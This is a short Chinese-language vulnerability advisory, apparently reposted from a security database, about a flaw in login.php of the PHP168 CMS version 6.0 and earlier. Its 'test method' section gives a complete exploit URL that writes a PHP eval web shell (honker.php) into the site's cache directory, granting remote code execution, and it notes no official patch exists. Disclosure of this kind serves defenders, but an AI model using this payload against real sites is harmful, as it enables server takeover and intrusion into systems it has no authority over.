PHP168 6.0及以下版本login.php存在重大安全漏洞
来源:岁月联盟
时间:2009-10-05
PHP168 6.0以下版本漏洞描述:
PHP168整站系统一直以来受广大用户的亲睐,它凭借着自身的强大、稳定、安全、灵活、易用等多方面的优势 ... 架构与功能的不断完善,让PHP168成为了最主流CMS系统之一。
login.php参数处理不当,安全者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。<*参考
http://huaidan.org/archives/3276.html
*>
测试方法:
本站提供程序(方法)可能带有安全性,仅供安全研究与教学之用,风险自负!login.php?makehtml=1&chdb[htmlname]=honker.php&chdb[path]=cache&content=?php%20@eval(_POST[honker]);?SEBUG安全建议:
暂无
等待官方补丁
